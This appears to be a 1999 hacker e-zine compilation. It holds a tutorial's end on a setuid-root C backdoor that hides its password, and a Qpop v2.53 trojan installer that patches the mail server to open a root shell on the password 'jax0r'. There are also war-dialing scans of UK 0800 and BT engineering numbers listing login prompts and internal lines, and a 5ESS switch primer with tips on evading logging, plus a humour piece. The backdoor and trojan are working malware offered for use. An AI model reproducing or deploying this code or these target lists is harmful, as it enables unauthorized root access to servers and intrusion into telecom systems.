lets see what this will do
14:57 ~Sinister@SINISTER /home/Sinister [26]> gcc -o back backdoor.c
14:57 ~Sinister@SINISTER /home/Sinister [27]> back
usage : back file name
14:57 ~Sinister@SINISTER /home/Sinister [28]> back [i entered here the
passwd i choosed]
#id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
# exit
15:02 ~Sinister@SINISTER /home/Sinister [29]>
now lets say the root wants to try it on a file he will allways get this
(doesnt matter if the file exist or doesnt exist)
15:02 ~Sinister@SINISTER /home/Sinister [29]>back backdoor.c
back : backdoor.c file has been backed!
15:03 ~Sinister@SINISTER /home/Sinister [30]>
nice (kinda) if you have more colorful msges to the root like
> back /etc/passwd
ok dear root u found my back door
>
then feel free to change :)
ok now that we have made a simple backdoor lets go and make somthin nice
with a passwd that doesnt shows
main(int argc, char *argv[])
{
chat PASS[7];
bzero(7,PASS);
PASS[0] = 'a';
PASS[1] = 'b';
PASS[2] = 'c';
PASS[3] = 'd';
PASS[4] = 'e';
PASS[5] = 'f';
PASS[6] = 'g';
PASS[7] = 'h';
if (argc != 2)
{
printf("usage: %s file name\n", argv[0]);
exit(1);
}
if(!strcmp(argv[1], PASS))
{
setuid(0);
setgid(0);
system("/bin/csh");
}
else
printf (%s : %s file has been backed!\n");
}
what we have made is we took our old backdoor and entered an array that
holds 8 charcters and (u can change it into more but i think 8 is enough)
in this program our passwd is 'abcdefgh' and puted zero's on them using
the bzero function those hiding the pass.
lets see what does it do:
15:09 ~Sinister@SINISTER /home/Sinister [2]# gcc -o back back.c
15:09 ~Sinister@SINISTER /home/Sinister [3]# back
usage: back file name
15:09 ~Sinister@SINISTER /home/Sinister [4]# back abcdefgh
#exit
15:09 ~Sinister@SINISTER /root [5]# back back.c
back : back.c file has been backed !
15:09 ~Sinister@SINISTER /home/Sinister [6]#
works nice heh?
well thats is all for this articale (sux doesnt it :(
COMMENT
for those who want my cool hand made prompt it is also colorful :) and it
is only colorful if u use csh or tcsh shells here it is :)
"%S%T%s %U%B~$USER@%m%b%u %B%/%b %U[%h]%u%B%#%b"
nice heh ? (well i dont care what u think i like it ! :)
till next time have a nice day and enjoy your self
see ya later!
11/6/99
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ O8OO917[XXXX] ]:::::::::::::[OO--[ by faith ]---[ ]::::::::::::::::
-->[OO]:::::::::::::::::::::::::::::::[ http://darkcyde.system7.org ]::::::::
__________ ____________________ ________
<< \________ __ ! / __ ___ \____________/
____ | \ /\ | \| / / \ /| \ ___ >
\ | |/__\ |__/|= | \ / | | /___\ _________
__ \_________|___/ \| \| \ | ! |___/ \____________/ >>
\ < \ ! \ \___ / ____ _____
\______________________________________/ \_________/
_________D4rkCyde_____________________ Communications __UK/USA_
/ ___ \ ____/ \_____
__/ ___<_________ / ¡ / / \ ___ ____________
/ | \ __ /|__/| / | ¡ | \ /___ \___>>____
____/ | |\ / | \|= | / \ | | \___/
____|___/ \/ |__/| \ \__ / \|___/ ________>___
__<<______/ ¡ \____________________/ \_________
*** 0D4YZ 0D4YZ 0D4YZ 0D4YZ 0D4YZ 0D4YZ ***
*************************************
* UK Carrier scan of o8oo 917 xxxx. *
* 19 January 1999 - 10 Febuary 1999 *
* 117 Carriers, scanned at 96ooBaud *
*************************************
*** WARNING ***
Unauthorised access to or misuse of these
systems is prohibited and constitutes an
offence under the Computer Misuse Act 1990.
We cannot be held responceible for your
actions if you violate this.
19-01-99 04:12:06 08009176827 c9600:
19-01-99 04:26:16 08009175162 c2400: 0P6÷æÈÈÿ"±8
E(zÙÁÅÀ£_ç
19-01-99 04:42:07 08009170887 c9600:
19-01-99 05:56:18 08009171841 c2400:
19-01-99 06:21:48 08009175479 c2400:
19-01-99 06:43:55 08009171894 c2400:
19-01-99 06:46:51 08009172997 c9600:
21-01-99 03:48:37 08009177917 c9600: Radius Authentication. @ Userid:
21-01-99 03:52:15 08009178510 c9600:
21-01-99 04:36:45 08009178731 c9600: Please press <Enter>.. Enter login name:
21-01-99 05:04:06 08009175201 c2400:
21-01-99 06:36:38 08009174127 c2400:
21-01-99 07:10:19 08009170512 c9600:
21-01-99 07:45:05 08009172700 c9600: Warning Unauthorised use of this network
is prohibited ! Username: PASSCODE:
22-01-99 03:10:15 08009173547 c9600:
22-01-99 03:29:35 08009172055 c2400:
22-01-99 03:43:22 08009171814 cxxxx:
22-01-99 04:39:07 08009175061 c2400:
22-01-99 04:49:08 08009172194 c9600: Please press <Enter>...I PAn Employee
IRHSOICB
22-01-99 05:11:14 08009174274 c2400:
22-01-99 06:07:00 08009179249 c9600:
22-01-99 06:16:54 08009173546 c9600:
22-01-99 07:42:00 08009179057 cxxxx: B00zz0BB00zz0B00zz0BDD18
B00zz0BDD18
22-01-99 16:24:04 08009171874 c9600:
22-01-99 16:32:03 08009174567 c9600:
23-01-99 02:56:13 08009176608 c9600: User Access Verification. Username:
23-01-99 03:15:37 08009175260 c2400:
23-01-99 03:32:41 08009175830 c2400:
23-01-99 03:59:19 08009174518 c9600: @ Userid:
23-01-99 05:17:30 08009175545 c2400:
23-01-99 05:26:33 08009172295 c: Leave a message and your contact details
and we will contact you as soon as
possible.
23-01-99 06:04:32 08009174390 c9600: Radius Authentication. @ Userid:
23-01-99 06:21:19 08009175834 c9600: Chorus/MIX V3.2 TTY Login:
23-01-99 06:31:19 08009178863 c9600:
23-01-99 18:28:39 08009172997 c9600:
23-01-99 18:39:15 08009176030 c9600:
24-01-99 06:46:03 08009171816 c9600: @ Userid:
24-01-99 07:17:45 08009171615 c9600:
24-01-99 08:06:31 08009176432 c9600:
24-01-99 09:17:30 08009170633 c9600: login:
24-01-99 09:18:53 08009170668 c9600:
24-01-99 11:06:07 08009179041 c9600: Welcome to USRobotics The Intelligent
Choice in Information Access. login:
24-01-99 12:42:15 08009179246 c9600:
24-01-99 18:59:37 08009178928 c9600: Welcome to InterLinx. interlinx!login:
25-01-99 03:42:37 08009171750 c9600:
25-01-99 03:44:17 08009173549 c9600:
25-01-99 04:09:45 08009179184 c9600:
25-01-99 05:16:43 08009175222 c2400:
25-01-99 16:36:18 08009178633 c9600: User Access Verification. Username:
25-01-99 16:39:39 08009173512 c9600: User Access Verification. Username:
26-01-99 05:07:12 08009174278 c2400:
26-01-99 05:31:47 08009170116 c9600:
26-01-99 05:37:25 08009178066 c9600: Please press <Enter>... I PSharron
Creaney SHARRON
26-01-99 05:52:21 08009176792 c2400:
26-01-99 06:48:46 08009176521 c9600: **B0100000027fed4
26-01-99 06:55:52 08009178703 c9600:
26-01-99 15:50:04 08009171800 c9600: Annex Command Line Interpreter *
Copyright (C) 1988, 1997 Bay Networks
Checking authorization, Please wait...
Annex username:
26-01-99 15:58:37 08009176950 c9600:
27-01-99 04:57:43 08009179457 c9600: @ Userid:
29-01-99 00:56:06 08009173548 c9600:
29-01-99 03:54:47 08009178374 C9600: Annex Command Line Interpreter *
Copyright (C) 1988, 1998 Bay Networks
#------------------------------------------------------#
# Welcome to the Watson Wyatt Remote Access Service #
# #
# None Authorized Users should disconnect NOW ! #
# #
#------------------------------------------------------#
Trying...
Connected to 126.52.18.187.
Attached to port 7
29-01-99 04:29:33 08009179206 c9600:
29-01-99 04:37:44 08009175775 c9600:
29-01-99 05:09:57 08009174298 c2400:
29-01-99 07:06:19 08009179248 c9600:
29-01-99 08:25:38 08009179245 c9600:
29-01-99 08:42:53 08009173432 c9600: Starting SecurID Authentication.User ID:
29-01-99 11:00:51 08009172017 c9600: CCCThis is really RAS3 User Access
Verification Username:
29-01-99 11:30:15 08009178212 c9600: User Access Verification Username:
SNK Challenge: 59886539 Enter Response:
30-01-99 03:15:17 08009175024 c2400:
30-01-99 03:32:24 08009176461 c9600: ÿAM¬ÿAM¬ÿAM¬ÿAM¬ÿAM¬ÿAM¬ÿ
30-01-99 04:11:52 08009171713 c9600:
30-01-99 04:19:58 08009176654 c9600: Starting Radius Authentication. @ Userid:
30-01-99 05:30:26 08009171368 c2400: UºES¸·«ÿZîåqÆéø6Ã[Þe
30-01-99 05:39:43 08009176703 c9600: @ Userid:
30-01-99 06:44:49 08009173545 c9600:
30-01-99 06:51:00 08009175510 c2400:
30-01-99 11:03:24 08009171020 c9600: @ Userid:
30-01-99 11:17:18 08009179789 c9600: USRobotics Courier V.Everything Dial
Security Session Serial Number
21OZD1G8EAQ3 Password (Ctrl-C to cancel)
31-01-99 06:08:05 08009178511 c9600:
31-01-99 06:29:55 08009179562 c9600:
31-01-99 06:47:32 08009172102 c9600: ·O¦UUUUUUUUUUKÿþ+++
31-01-99 06:52:43 08009173433 c9600:
02-02-99 06:52:03 08009179427 c9600: Starting Radius Authentication.@ Userid: ?
02-02-99 07:02:01 08009170918 c9600:
02-02-99 07:03:15 08009179247 c9600:
03-02-99 05:36:19 08009174365 c9600: ** First Option ** Login:
03-02-99 05:39:22 08009172903 c2400: (shitload of garbage charactors)
03-02-99 05:57:07 08009173317 c9600:
03-02-99 06:34:02 08009173023 c9600: Annex Command Line Interpreter *
Copyright (C) 1988, 1997 Bay Networks
Checking authorization, Please wait...
Annex username:
03-02-99 09:22:04 08009170631 c9600:
04-02-99 04:11:23 08009178407 c9600: Starting Radius Authentication. @ Userid:
04-02-99 04:28:57 08009170889 c9600:
04-02-99 04:44:53 08009170064 c9600: User Access Verification Username:
04-02-99 05:08:00 08009173551 c9600: Enter ID:
04-02-99 05:09:01 08009176851 c9600: Generic-Sys (generic) [HP Release A.B9.
04] HP-UX login:
04-02-99 06:10:37 08009170343 c2400: PLEASE ENTER PASSWORD:
04-02-99 06:22:43 08009175536 c9600: @ Userid:
04-02-99 06:45:12 08009175840 c2400:
05-02-99 04:19:03 08009175151 c2400:
05-02-99 06:24:48 08009179899 c9600: User Access Verification. Username:
05-02-99 07:02:31 08009175170 c2400:
05-02-99 08:31:05 08009172995 c9600:
05-02-99 08:38:00 08009171832 c9600: login:
06-02-99 02:22:18 08009175422 c2400: 0\ÿä5ß$xíü÷w_1¬5ó!D´Ê7
06-02-99 05:44:27 08009171813 c9600:
06-02-99 08:22:14 08009170288 c9600:
06-02-99 08:24:09 08009176562 c9600:
06-02-99 09:09:34 08009171731 c9600: User Access Verification. Username:
07-02-99 07:21:39 08009170366 c2400:
07-02-99 07:54:11 08009173451 c9600:
08-02-99 05:02:07 08009173650 c2400: 0
08-02-99 05:45:19 08009175206 c2400:
08-02-99 06:42:28 08009179942 c9600:
08-02-99 06:54:39 08009172996 c9600:
09-02-99 06:05:47 08009172034 c9600:
10-02-99 15:52:04 08009174514 c9600: @ Userid:
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Qpop Trojan Installer ]::[OO--[ by gov-boi ]-[ hotmetal@hack.co.za
-->[OO]:::::::::::::::::::::::::::::::[ http://www.hack.co.za ]::::::::::::::
/****
Qpop v2.53 Trojan Installer v1.1
c0de by gov-boi/hotmetal of (src)
hotmetal@hack.co.za
Idea thought of by:
nikel-com <nikel@legion2000.cc>
usage:
tar -zxf qpopper2.53.tar.Z ..
copy src-qpopd.c into the "qpopper2.53" root directory ..
compile src-qpopd.c .. run ..
compile qpopper2.53 .. install .. ;)
and have phun kiddies ;)
backd00r password is "jax0r"
****/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void display_usage(void);
int main(int argc, char *argv[])
{
char *scanstring = "The client command was not located in the command/state table";
char *w00p="pop_get_command.c";
char buffer[1002];
char buffer2[1002];
FILE *fp, *wo0p;
if((fp = fopen(w00p, "r")) == NULL)
{
fprintf(stderr, "Error opening file: pop_get_command.c\n");
fprintf(stderr, "missi0n unsuccessfull.. lam3r!\n");
exit(1);
}
wo0p = fopen("zzzzzz","w");
while(fgets(buffer, 1000, fp) != NULL) {
strcpy(buffer2, buffer);
if(strstr(buffer, scanstring) != 0)
{
fprintf(wo0p," /* The client command was not located in the command/state table */\n");
fprintf(wo0p," if (p->pop_command = \"jax0r\")\n");
fprintf(wo0p," { execl(\"/bin/sh\",\"/bin/sh -i\", NULL);return(0);}\n");
}
if(strstr(buffer, scanstring) == 0)
{ fprintf(wo0p,"%s", buffer2); }
}
fclose(fp);
fclose(wo0p);
system("mv zzzzzz pop_get_command.c");
fprintf(stderr, "missi0n successfull.. i phear j00!@#\n");
return 0;
}
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Rolling Deep ]::::::::::::[OO--[ by tgb ]---[ ]::::::::::::::::::::
-->[OO]:::::::::::::::::::::::::::::::[ http://noprotocol.org/tgb ]::::::::::
Rolling Deep
With all the dangers and precarious situations the modern hax0r can find
himself in on the streets, the ninties have brought forth the need to "roll
deep." The whole rationale behind the concept of rolling deep lies in the age
old adage. "Strength in numbers," or something along those lines, although
rolling deep by no means requires a large group or backup posse. The term
rolling deep stems directly from the world of hardcore hip hop and gangsta
rap, and is often used in conjunction with phrases like, "Ya best proteck ya
neck," "bakdafukup," or other equally street-smart phrases that manage to
incorporate both defensivness and threat. In any case, the implications are
easily identifiable and the prmoise of quick retaliation looms in the
foreground; rolling deep is a means of letting people know that you are not
to be fucked with. The perils of being caught slippin' in this day and age
are just too great. I know the value of rolling deep and have integrated it
into my daily routine, rolling deep for such mundane tasks as getting a late-
night snack from the fridge, buying a new sweater, or making a important
phone call home. Hopefully some of the following tips, examples, and
observations will acquaint you with the ways of rolling deep as fuck, 'cause
it's too dangerous to be caught shallow.
1. Put on the hardest clothes you can find (consult the latest number one
video on Rap City) and practice scowling in the mirror for a few hours.
The scowl is on the most integral aspects of rolling deep and must be
perfected, although allowances can be made for the Flava-Flav type joker
in every roup. Take a deep breath and tell yourself you are hard until you
believe it.
2. Pretend you are in a rap video, running down the street in slow motion or
backing up the MC. Visualize yourself as an actual member of a video
posse.
3. Practice the "What the fuck?!" arm gesture (both arms open, palms spread
outward) until it becomes an automatic response to any question,
especially if from a parent, cop, boss, or teacher.
4. Grow some sort of "hard" facial hair.
5. Wear a very unhip pair of sunglasses--not bullshit Oakley or Arnet, but
something like cop glasses or oversized mom-style glaasses. Basically
anything you can snag out of a lost-and-found-bin will do.
6. Look around a lot, like you expecting static from any direction.
7. Cultivate a fake limp or strut and walk extremely slowly.
8. Refer to people only as "bitches" or "fools." Learn to integrate the
following words or phrases into your everyday speech, regardless of their
meaning in your life: gat, nine, blast in the face, bitchslap,
gangstalean, etc.
You are now ready to assemble the crew and synchronize the eight-step rolling
deep program. Usually a larger group will signify a deeper roll, but this is
not always the case. Certain people will never attain the ability to roll
deep, no matter how much backup they have. Conversely, some motherfuckers
roll deep when hanging out on solo tip. Some of the deepest rollers are the
strong, silent types who can handles themselves in any situation. Consider
the following list of some people who roll deep and some who don't quite make
it.
Deep As Fuck:
Wu-Tang, the Warriors (from that old '70s movie), this dude I once saw
lounging in a designer sweatsuit and shades, Slayer.
Wading Pool:
Hammer, New Kids On The Block, Blackstreet, any fast food employee or
manager, rock star snowboarders, bitch-ass rollerbladers.
Of course those you new to the ways of rolling deep should never try to bust
a flex on someone with experience. First things first, you should go in
gradually, the way one would enter a pool of freezing water. You should
initially roll deep only on inanimate objects such as street signs, a jammed
or locked door, or a soda machine that shorted your coin. From that point you
should work your way up to blind people or alley cats, but only when you feel
comfortable. Progression will naturally lead you to flexin' on old ladies and
infants. Get confident, live your lyrics, and work your way up to speed.
Eventually you'll be able to walk the streets with pride and conviction that
can only come with the knowledge that your are rolling deep.
--tgb
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ 5ESS CDX/VCDXs ]:::::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]::::
-->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]:::::::::::::
5ESS-2OOO Compact Exchange Units.
by hybr1d (http://DTMF.org/hybrid)
o Introduction
o Types of compact exchanges
o CDX exchange
o VCDX exchange
o Conclusion
Introduction
------------
This is a very compact file, designed to be an intorduction, or primer to
5ESS local compact digital exchange units. I am wrtting this off the top of
my head, so don't expect it to be very complex in technical nature. For
starters I'll explain a little about the new 5ESS switches and there
functions. We've all heard of the millenium bug, and it's supposid ability to
take out massive networks etc. Well Lucent technologys, Bellcore (now
telecord communications or somthing), aswell as lata exchange carrier
providers such as MCI, AT&T, Sprint, and all the RBOC's such as SWBell, etc,
all got a bit paranoid and decided to enhance to current 5ESS switching
configurations to a new architecture they feel would be compatable with the
millenium software and network problems. The new 5ESS-2OOO switches are all
basically the same as conventional 5ESS switches, except the software parts,
such as the administration control software platforms, and global title
translation software etc, have been upgraded to be Y2K compatable. As well
as this, the new 5ESS switches have been modified (based upon conventional
5ESS) to be easily upgraded in the future with new modules for future
telecommunications developments. In other words, the new digital switches are
very very very souped-up versions of 5ESS, infact, I would concider them to
be one of the most versatile switches around. Now the deal with these new
digital switching systems is that they can handle more and more lines, more
network traffic, aswell as a very upgraded ability for general system
capacity. They have also been upgraded with new security features to stop
people like me from gaining access to the local administration part which
is accessable via x25, the PSTN, and the net (on a 'secret' IP range).. I'm
not going to go into that at the moment, thats another file.. Anyways, as I
was saying, the new 5ESS-2OOO digital exchanges are like souped up 5ESS
switches. Before there where people bitching about how they can get 'traced'
messing around on the phone network because 5ESS logs shit. Well, I got news
for you, 99.9% of all worldwide switching mechanisms, electro-mechanical, or
digital derived, ALL log stuff, and always have done. It's just with these
new 5ESS-2OOO digital exchanges, its more obvious if you are messing around.
Lets say for example you where scanning over 400 numbers a night via your
land line.. Normaly a 5ESS, DMS, TXE etc would just log your line usuage,
calling patterns etc into a subscriber log in one of the switches sub-system
parts. You would only usually get discovered if one of the field technitions,
glanced at the data for you line usuage. Thats ok, because we all no that
exchange field operators are lame and lazy, but what about this new 5ESS-
2OOO line loging equipment? - welp, I have bad news for you. If you scan
in continuous, or repetitive cycles over your subscriber loop, the chances
are, you're gonna get your haxoring ass taken to
court by your RBOC, or
whatever provider you are with. The reason for this is that 5ESS-2OOO
digital switches continously monitor the activity, and network usuage of over
100,000 lines similtaniously. Instead of loging line status etc into a
dormant log file in a sub-system, if one of the local switches notices that
somthings up, a field adminstrator is notified imediatly, probably by the
means of a status bar on an uplinked terminal. The new switches have been
modified to be very stringent on system capacity and usuage patterns, and
will notify any field office engineer of the slightest problem. The new 5ESS-
2OOO switches are basically like UK monologs, in other words, they record
everything about your line, all digits dialed, even after terminating
destination point, they even log the time intervals between each tone you
dial/emit. Basically they are the big-bro of the phone system so start
getting paranoid. (I know for a fact, that it is possible to log onto one of
the local exchange units and turn line logging OFF, and even make your line
appear to be non-existant). Anhow, I think I've probably made a few people a
little paranoid now, on with the rest of the file.
Types of local compact digital exchanges
----------------------------------------
Werd, well now its time for the focus of the file. I'm not writting a mad
big file on the entire 5ESS-2OOO network because it would take _ages_, so
I'm going to focus on local compact excahnges designed for the rurual
community such as college campuses and areas with not many subscribers, like
suberban areas of towns. There are 2 main types of compact 5ESS-2OOO local
switch, the CDX (Compact Digital eXchange), and the VCDX (Very Compact
Digital eXchange). Both these new units are designed to be very echonimacal
for the money raking telcos. The idea is that these switches are being placed
in new suberban housing developments, and are being integrated into the PSTN
as we speak. The CDX digital exchange for example is designed to be very
snall, handeling small local phone networks, it can however be upgraed with
the implementation of modules, kind of like plug'n'play, until the switch
becomes a fully fledged 5ESS-2OOO unit if required in the future. Lets take
a look at these local networks in more detail.
The CDX digital exchange
------------------------
The CDX (Compact Digital eXchange) is a small sized siwtch configuration,
which is capable of providing the same services to subscribers the same as
a conventional 5ESS switch would. Unlike the older rural exchange units,
these new switches are capable of handeling more advanced telecommunications
services like wideband data transmission, and video data etc. The switch is
housed in a cabinet that is 6 foot high, 29.9 inches wide, and 23.6 inches
deep. The switch is desinged to be a stand alone unit and as I said before,
very capable of handeling current/future telecommunications developments and
serverices such as POTS lines (Plain Old Telephone Service), equal access
services, ISDN (Integrated Services Digital Network), CENTREX services such
as call waiting, hold, etc etc. The system is also designed to be fully
compatable with the Signaling System 7 telephony protocol which has been
implemented over the majourity of the international PSTN. The switch can
handle from 100 subscriber loops, upto 15,000 local access lines or 15,000
remote access lines. CDX operates on the same software as the conventional
5ESS-2OOO switch, and also has the same call routing architecture (physical).
______________________ Admin Console AM: Adminstration Module
| | ______ CM2: Communications Module
| | | | CM2C: " Compact
| 3B21D |-------| | MSDT: SLC-2OOO Multi -
| | |______| Services Remote
|______________________| Module
|
|
| _________________
| | |
_______|_______ | SM or |--|
| | | SM-2OOO |--|
| CM2C |-----------| |--| (upto 6 RSM
|_______________| | |--| outputs)
| | |--|
/ |_________________|
/ |
/ |
_______|_______ ______|______ _________
| | | | | |
| ORM | | |--------| local |
|_______________| |_____________| |_________|
| | | |
ORM: Remote Module
RSM: Remote Switching Module
SLC: Subscriber Loop Carrier
SM: Switching Module
The VCDX digital exchange
-------------------------
VCDX stands for (VERY Compact Digital eXchange), and when I say compact, I
mean compact. It is the smallest of all 5ESS-2OOO switch configurations but
is still very capable of providing the same services as its bigger bro, the
CDX switch. This switch is used by CATV, CAPS, small towns, and government
facilitys. The switch is also capable of providing Central Office services
such as the usual call waiting, and ISDN. The intersting thing about this
switch is that it supports Carrier Identification Code (CIC) expansion and
is compatable with changing NPA's in the Interchangable Numbering Plan Area,
as required by reglatory bodys such as the FCC.
The VCDX switch can support various configurations using a single 5ESS
Switching Module (SM) to handle the call processing. The SM is controlled by
a sophisticated UNIX software-based workstation which provides administrative
and maintenance capabilities. A mimimum configuration of 2 cabinets that are
6 foot high x 29.9 inches wide x 23.6 inches deep in size is necessary and
thus it fits in a small space. If left in standard mode, the VCDX can handle
upto 1,500 lines. If the SM-2OOO unit is impemented as a module, the switch
can handle as many as 14,000 lines.
_____________ _______
| | | |
| workstation |----------------| modem |
|_____________| |_______|
|
|
|
__________|___________
_____________ | |--|
| | | |--|
| local dist |-------------| SM or SM-2OOO |--|
|_____________| | |--|
| | | | | |______________________|--|
(to local distrobution plant. then to subscriber loops.)
Conclusion
----------
Welp, thats it for this short file/article. Hope you enjoyed it. As you can
see the 5ESS lcoal unit range is very complex, and is a massive improvement
on previous local switching networks. Just be carefull about the subscriber
loop monitoring modules. If you'd like more info on 5ESS-2OOO switching, I
have put some decent information up on my website for your enjoyment and
viewing pleasure. Goto http://www.dtmf.org/hybrid and check it out, you'll
also be able to find the other 30+ files I've written in the past on there
aswell, so go there now@! thats an order, heh. Anyways, thats it, peace.
[http://darkcyde.system7.org] [http://dtmf.org/hybrid] [http://system7.org]
[http://phunc.com] [http://ninex.com] [http://b4b0.org]
shouts to [9x] [b4b0] [D4RKCYDE] [subz] [gr1p] [t1p] [ph1x] [downt1me] [euk]
[lowtek] [digiphreq] [zomba] [force] [psyclone] [pbxphreak] [gb]
[ch1ckie] [knight] [siezer] [oeb] [barby] [jasun] [pvbbs] [nino]
hybrid@dtmf.org
#darkcyde efnet
-------------
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ O8OO672[XXX] ]::::::::::::::[OO--[ by faith ]---[ ]::::::::::::::::
-->[OO]:::::::::::::::::::::::::::::::[ http://darkcyde.system7.org ]::::::::
*******************************
Scan of BT engineering exchange
0800 672 {xxx} 1999
*******************************
000 not recognised
001 BT paging service (24hrs)
002 - 019 nr
020 "******* messaging service - who are you calling please" :)
021 - 066 dead tone
067 BT pagaing (24hrs) some freaky woman i couldn't understand
068 - 099 nr
100 carrier
101 ringing
102 residential BT accounts service
103 carrier
****************************************************************************
104 costiomer service management centre edinborough network service
provision control function has changed isdn 30 provision stage 1 look check
0800282212 isdn30 deta configeration and commisioning press 2 or dial
0800 592 831 isdn 2 provision assistance dial 3 for keep on dial 4
**MARIDIAN**
****************************************************************************
105 costomer servie amnaggement centre ed costomer repair enq 1 cch issues 3
escilation enq 4 **meridian**
106 ringing
107 carrier
108 ringing
109 dead tone
110 weird scottishj voice
111 - 114 dead tone
115 please leave a message after the tone - maridian } someone cant spell
116 ringing
117 retail sales
118 - 119 ringing
120 dead tone
121 some bloke
122 ringing
123 dead tone
124 prsonal answer phone
125 dead tone
126 "hello"
127 ringing
128
129
130 carrier
***********************************************************************
131 CSX RAM2000 system 1 to sign on - 2 to sign off
132 welcome to the BT payroll please enter you BT employee ID number
***********************************************************************
133 this number has moved
134 ringing
135 carrier
136 dead tone
137 nr
138 ringing
139 carrier
140 north of england AMU
141 - 143 dead tone
144 BT info line
145 carrier
146 operator
147 carrier
148 HR & DS????
149 carrier
150 - 158 dead tone
159 ringing
160 sincorta???? help desk
161 nr
162 dead tone
163 employment law policy helpline
164 - 168 regia help desk
169 ringing
170 strange ring
171 - 174 ringing
175 dead tone
176 wolverhampton SMC
177 ? SMC
178 - 179 ringing
180 - 189 regia help desk
190 - 191 carrier
192 ringing
193 carrier
194 engaged
195 - 196 carrier
197 dead tone
198 ringing
199 dead tone
200 ringing
201 - 206 carrier
207 - 213 ringing
214 carrier
215 - 218 ringing
219 rec managers centre edinborough????
220 summit direct is closed
221 some bloke
222 service centre???
223 this number has ceased
224 some woman
225 ringing
226 engaged
227 - 229 service centre
230 dead tone
231 - 232 BT residential sales + accounts service
233 BT touchpoint helpdesk
234 engaged
235 dead tone
236 ringing
237 - 238 dead tone
239 engaged
240 - 249 regia
250 - 254 ringing
255 dead tone
256 ringing
257 dead tone
258 BT ACP Team
259 carrier
260 some bloke
261 dead tone
262 nr
263 ringing
264 carrier
265 BT Corparate and government accounts
266 ringing
267 regia
268 carrier
269 - 271 ringing
272 - 275 BT payphone???
276 dead tone
277 some bloke
278 - 279 ringing
280 dead tone
**************************************************************************
281 please enter your 3 digit channel #, if you require a list of channel
#'s please enter 999;
**************************************************************************
282 ringing
283 dead tone
284 - 289 ringing
290 carrier
291 - 292 visa international automated referal service
293 - 299 carrier
300 dead tone
301 - rang.
302 - BT & cellnet tag-team, on holdiday, answer phone.
303 - rang.
304 -
305 -
306 -
307 - rang.
308 - took time to get through, just rang.
309 - rang.
310 - fucking neat-o. VMB? some kinda technical centre.
311 - rang!
312 - 0800 990088
313 - 0800 990088
314 - 0800 990088
315 - rang.
316 - 0800 990088
317 -
318 - pair allocation help desk
319 - rang.
320 - rang.
321 -
322 -
323 - BT residensal customer account service
324 - --------======================++++++ENGAGDED+++++================---
325 -
326 - rang
327 - rang
328 - CARRIER!
329 - rang
330 - rang
331 - rang
332 - rang
333 - fax
334 - fax/modem
335 -
336 -
337 -
338 -
339 -
340 - rang
341 - ---------------============+++ENGAGDED+++============--------------
342 - ---------------============+++ENGAGDED+++============--------------
343 - voice
344 - BT business something, voice.
345 - rang
346 - rang
347 -
348 -
349 -
350 -
351 -
352 -
353 - BT residensal repair service
354 -
355 -
356 -
357 - rang
358 - BCS-3 Meridian Mail system BCS ;)
359 - rang, then answer phone
360 - reck-care? help desk. options
361 - reck-care? help desk. options
362 - reck-care? help desk. options
363 - reck-care? help desk. options
364 - reck-care? help desk. options
365 - reck-care? help desk. options
366 - reck-care? help desk. options
367 - reck-care? help desk. options
368 - reck-care? help desk. options
369 - reck-care? help desk. options
370 -
371 - rang
372 - rang
373 - rang
374 - rang
375 - rang
376 - rang
377 - rang
378 -
379 - rang
380 -
381 -
382 -
383 - rang
384 -
385 -
386 -
387 -
388 -
389 -
390 -
391 - help desk for something
392 - rang
393 - carrier
394 -
395 - london product support centre. talking machine.
396 - rang
397 - really bad answer machine for something on BT?
398 - rang
399 -
400 - someone stevenson VMB.
401 - fax
402 - rang
403 - rang
404 - rang
405 -
406 -
407 - rang
408 - rang
409 - rang
410 - voice
411 - BT something solutions help desk
412 -
413 - rang
414 - voice
415 - rang
416 - really bad answer phone
417 - really bad answer phone
418 - rang
419 - answer phone
420 - rang
421 - rang
422 - rang
423 - rang
424 - rang
425 - rang
426 - rang
427 - rang
428 - rang
429 - rang
430 - BT national meridian help service
431 - BT residensal customer accounts
432 - rang
433 -
434 - BT residensal customer accounts
435 - BT direct debit customers account
436 - BT residensal customer accounts
437 -
438 - voice
439 - rang
440 - rang
441 - rang
442 - rang
443 - rang
444 - fax
***************************
445 - BT mcp credit control
***************************
446 -
447 -
448 - rang
449 - rang
450 - rang
451 - rang
452 - rang
453 - rang
454 - rang
455 - pual bowshure VMB
456 - rang
457 - rang
458 - rang
459 - rang
460 -
461 - BT service management
462 - edinbough service manager
463 - voice
464 - voice
465 - voice
466 - voice /*same voice i think, poor bastard, it just gone 02:01am */
467 - bt local government?
468 - BT 24hour.... /*cut him off*/
469 - rang
470 - rang
471 - voice
472 - rang
473 - rang
474 - rang
475 - rang
476 - BT residentsal customer account service
477 -
478 - rang
479 - fax
480 - voice
481 - rang
482 - voice
483 - BT VOICE MESSAGING.
484 - answer machine telecom sales desk
485 - answer machine telecom sales desk
486 - answer machine telecom sales desk
487 - answer machine telecom sales desk
488 - answer machine telecom sales desk
489 - answer machine telecom sales desk
490 - rang
491 - rang
492 - rang
493 - forwards to a VMB, but can not access(no suscibe)
494 - rang
495 - rang
496 - rang
497 - rang
498 - rang
499 - rang
500 - rang
501 - fax
502 - fax
503 - fax
504 - fax
505 - fax
506 - fax
507 - fax
508 - fax
509 - fax
510 -
511 - voice. a party?
512 - answer phone
513 - rang
514 - answer phone
515 - answer phone
516 - answer phone
517 - answer phone
518 - answer phone
519 - rang
520 -
521 -
522 -
523 - rang
524 -
525 - Concert VNS. card and pin #
***************************************************
526 - FUCKING INTERESTING (dialtone)
***************************************************
527 - rang
528 - BT customer service centre
529 - BT service management
530 - BT national meridian operation centre
531 -
532 -
***************************************************
533 - HAHAHAH THE NAME GAME NUMBER
***************************************************
534 -
535 -
536 -
537 - BT something or another
538 - BT sincordless solutions
539 -
540 -
541 -
542 - BT residensal customer account service
543 - fax
544 -
